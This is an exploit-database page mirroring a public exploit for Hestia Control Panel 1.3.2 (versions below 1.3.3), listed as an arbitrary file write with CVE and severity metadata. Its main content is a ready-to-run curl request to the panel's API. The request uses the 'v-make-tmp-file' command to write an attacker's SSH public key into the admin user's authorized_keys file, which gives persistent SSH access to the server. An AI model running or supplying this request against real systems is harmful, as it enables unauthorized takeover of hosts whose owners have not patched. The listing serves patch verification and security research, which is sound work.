Advertisement






Hestia Control Panel 1.3.2 Arbitrary File Write

CVE Category Price Severity
CVE-2021-24313 CWE-22 $500 Critical
Author Risk Exploitation Type Date
Unnamed Critical Remote 2021-03-18
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021030113

Below is a copy:

Hestia Control Panel 1.3.2 Arbitrary File Write
# Title: Hestia Control Panel 1.3.2 - Arbitrary File Write
# Date: 07.03.2021
# Author: Numan Trle
# Vendor Homepage: https://hestiacp.com/
# Software Link: https://github.com/hestiacp/hestiacp
# Version: < 1.3.3
# Tested on: HestiaCP Version 1.3.2

curl --location --request POST 'https://TARGET:8083/api/index.php' \
--form 'hash="HERE_API_KEY"' \
--form 'returncode="yes"' \
--form 'cmd="v-make-tmp-file"' \
--form 'arg1="ssh-rsa HERE_KEY"' \
--form 'arg2="/home/admin/.ssh/authorized_keys"' \
--form 'arg3=""' \
--form 'arg4=""' \
--form 'arg5=""'

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum